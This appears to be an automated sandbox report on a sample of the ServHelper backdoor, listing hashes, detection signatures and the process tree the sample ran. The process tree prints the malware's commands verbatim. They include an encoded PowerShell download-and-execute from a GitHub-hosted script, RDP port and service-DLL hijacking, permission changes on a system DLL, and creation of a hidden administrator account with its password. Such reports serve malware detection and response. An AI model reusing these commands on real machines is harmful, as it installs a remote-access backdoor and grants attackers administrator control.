Analysis
-
max time kernel
131s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 01:21
Static task
static1
Behavioral task
behavioral1
Sample
9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe
-
Size
5.7MB
-
MD5
9c3e078b4506224ea8070d01294de9ac
-
SHA1
7816a2f30124873106386e8b5b0dfb476d1debef
-
SHA256
8418c39d82911d39bae75090677ce1f259382a64d784e86acf31a6d9ba0ce3d9
-
SHA512
46e44917d8d1abe4228dc3f73b8cfb5507d99766fffa2b4a798e805e506aceed531bfa5b27a1e6f87fb59b71e32f21e75846ad300d8dc77ffcd2a0ff5a273bd4
-
SSDEEP
49152:aEs7HCrb/T/vO90dL3BmAFd4A64nsfJdBOGm5K6UVJ9eLZNVj/lHoRQ1wYr9MYEd:aEQjgGHmAQQQQQQQQQQQQQdC
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2800 powershell.exe 6 2800 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 2796 icacls.exe 2712 icacls.exe 2720 icacls.exe 2252 icacls.exe 2636 icacls.exe 2648 icacls.exe 3020 takeown.exe 2788 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1992 1992 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 2796 icacls.exe 2712 icacls.exe 2720 icacls.exe 2252 icacls.exe 2636 icacls.exe 2648 icacls.exe 3020 takeown.exe 2788 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGHYO8M0FMUX78OU2FER.temp powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f00b9c506585da01 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2480 powershell.exe 2344 powershell.exe 1952 powershell.exe 696 powershell.exe 2480 powershell.exe 2480 powershell.exe 2480 powershell.exe 2800 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1992 1992 1992 1992 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 696 powershell.exe Token: SeRestorePrivilege 2796 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2564 WMIC.exe Token: SeIncreaseQuotaPrivilege 2564 WMIC.exe Token: SeAuditPrivilege 2564 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2564 WMIC.exe Token: SeIncreaseQuotaPrivilege 2564 WMIC.exe Token: SeAuditPrivilege 2564 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1344 WMIC.exe Token: SeIncreaseQuotaPrivilege 1344 WMIC.exe Token: SeAuditPrivilege 1344 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1344 WMIC.exe Token: SeIncreaseQuotaPrivilege 1344 WMIC.exe Token: SeAuditPrivilege 1344 WMIC.exe Token: SeDebugPrivilege 2800 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2820 wrote to memory of 2480 2820 9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe powershell.exe PID 2820 wrote to memory of 2480 2820 9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe powershell.exe PID 2820 wrote to memory of 2480 2820 9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe powershell.exe PID 2480 wrote to memory of 2340 2480 powershell.exe csc.exe PID 2480 wrote to memory of 2340 2480 powershell.exe csc.exe PID 2480 wrote to memory of 2340 2480 powershell.exe csc.exe PID 2340 wrote to memory of 2356 2340 csc.exe cvtres.exe PID 2340 wrote to memory of 2356 2340 csc.exe cvtres.exe PID 2340 wrote to memory of 2356 2340 csc.exe cvtres.exe PID 2480 wrote to memory of 2344 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 2344 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 2344 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 1952 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 1952 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 1952 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 696 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 696 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 696 2480 powershell.exe powershell.exe PID 2480 wrote to memory of 3020 2480 powershell.exe takeown.exe PID 2480 wrote to memory of 3020 2480 powershell.exe takeown.exe PID 2480 wrote to memory of 3020 2480 powershell.exe takeown.exe PID 2480 wrote to memory of 2788 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2788 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2788 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2796 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2796 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2796 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2712 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2712 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2712 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2720 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2720 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2720 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2252 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2252 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2252 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2636 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2636 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2636 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2648 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2648 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2648 2480 powershell.exe icacls.exe PID 2480 wrote to memory of 2708 2480 powershell.exe reg.exe PID 2480 wrote to memory of 2708 2480 powershell.exe reg.exe PID 2480 wrote to memory of 2708 2480 powershell.exe reg.exe PID 2480 wrote to memory of 2600 2480 powershell.exe reg.exe PID 2480 wrote to memory of 2600 2480 powershell.exe reg.exe PID 2480 wrote to memory of 2600 2480 powershell.exe reg.exe PID 2480 wrote to memory of 1128 2480 powershell.exe reg.exe PID 2480 wrote to memory of 1128 2480 powershell.exe reg.exe PID 2480 wrote to memory of 1128 2480 powershell.exe reg.exe PID 2480 wrote to memory of 1828 2480 powershell.exe net.exe PID 2480 wrote to memory of 1828 2480 powershell.exe net.exe PID 2480 wrote to memory of 1828 2480 powershell.exe net.exe PID 1828 wrote to memory of 1572 1828 net.exe net1.exe PID 1828 wrote to memory of 1572 1828 net.exe net1.exe PID 1828 wrote to memory of 1572 1828 net.exe net1.exe PID 2480 wrote to memory of 1700 2480 powershell.exe cmd.exe PID 2480 wrote to memory of 1700 2480 powershell.exe cmd.exe PID 2480 wrote to memory of 1700 2480 powershell.exe cmd.exe PID 1700 wrote to memory of 976 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 976 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 976 1700 cmd.exe cmd.exe PID 976 wrote to memory of 328 976 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9c3e078b4506224ea8070d01294de9ac_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwpow3jp.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9741.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9740.tmp"4⤵PID:2356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3020
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2788
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2712
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2720
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2252
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2636
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2648
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2708
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2600
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1128
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1548
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:876
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1968
-
C:\Windows\system32\net.exenet start TermService5⤵PID:3024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1972
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2304
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:948
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:2852
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Y4XauIG6 /add1⤵PID:1740
-
C:\Windows\system32\net.exenet.exe user wgautilacc Y4XauIG6 /add2⤵PID:864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Y4XauIG6 /add3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1120
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:2116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:292
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD1⤵PID:2416
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD2⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:2236
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Y4XauIG61⤵PID:2148
-
C:\Windows\system32\net.exenet.exe user wgautilacc Y4XauIG62⤵PID:2476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Y4XauIG63⤵PID:1748
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2532
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2356
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2552
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f5b3a1f8e31fd8169e8a81b0e508f9c2
SHA184d67f1833b8651b6a8b2c0e30fa79680234a0ef
SHA256e46cc7064c844f207586f6a27d3d831c9adac28e673ea846fd74674ab1d34031
SHA512989b49186baaef433a7729a6fc65802ca7a84f2e45afd9aee5ab856c67603981f25af504692d7f971d9fd0945ea3c95771c6d0d50f600881992ea695ab6ac10c
-
Filesize
2.5MB
MD51ef6eef1d39c71661339d818226d688d
SHA1b3e44163a9d9894d091f59f888d7d5d90e68e216
SHA256dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a
SHA5128deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49
-
Filesize
3KB
MD5acc9acf4cb7dc3b234d6d3be7318be42
SHA1248333888c7df6029eeede6abe9913b0868cc51e
SHA2568ab2c207fcc35680e0a8c7bd6683931629921006ac796a77e865f97852ee4971
SHA51223a153024cf86431540cfb61574f85fa88614765878748987503a58323a5da84ff6ad634d113120a729e6f2a05d6735a37f9dbdd7572d71f92947ccea9a54047
-
Filesize
7KB
MD5ec48f9aec7ed617019b0cca54498ea6b
SHA1f0f9293198ab5d62f5803d65e1740f7be7c14c16
SHA2563c45d5f0ebc3ebb52d6933df95727c62682d786591af5f8a2c2a23a358a4df2f
SHA512fc55a3a0c41fa8984fb68965e20ed8e407c82db66d677cd7fe66c20640cb92ec00cabfd17557e5cd75423f1629228a778257946c012e90aeba61e42cb3763acf
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dbe1c9b55848902d73ba7c006c6e1219
SHA1f2538efef96a6009513b8b67f4b87ca31f68d951
SHA256d3dc187e374b00900063ffed31039716d7cbeb0991823ecebc351537392aa0e9
SHA51252c63a9bf376e7ba29a4b4d26f9339dbbaad342cc7d600df458a05468a3baf509bac81c1217268d1cd9713859cff2a39ba5a325d4aabe23af61c151d1dd52114
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5f5fdc5a5ad0e660876a1ed2c59264266
SHA11ab7a2c72ebd5a7231a924ebe9f1689229ac28b2
SHA256bfe743de864adf523230030622fea9bd3f363c86092f29822d5733c6f1eea4a1
SHA51246cbc91414d5582b714b1c2b0b4dd04874bd552354249346624030056ef2cf24b6068ba7411ada41f867e3ae8b69057e8f4151099dc9948b3a173cb4985822c2
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD51b8d18d8cf25f56dbf1231d6636e483a
SHA19cc82733cc46ae0d9c5c7d3594a2a5aa75fe7955
SHA2566ccd76f3ca87d6114d49d6dfa4a61797dfa44a8ca9be670408ebbd0474dbc1ff
SHA512f083dbacd6ae3934695fdbdde3d4d793a844bf703e456647b64a2d366148cdc2304cf6d5f77cb3ace79f472720aea368458c34b288249c0b21bd60278df97f3f
-
Filesize
60KB
MD544161e115bf968d5b616d254be2f38a1
SHA1b801a9318b1fc89996f76055c69e071e0fed368a
SHA2562750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491
SHA512375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e
-
Filesize
743KB
MD57245ed7533b89d29f7f5bb35830d4560
SHA18efaef0babf855989e460451803032940ae0c7bd
SHA25689549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638
SHA512f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3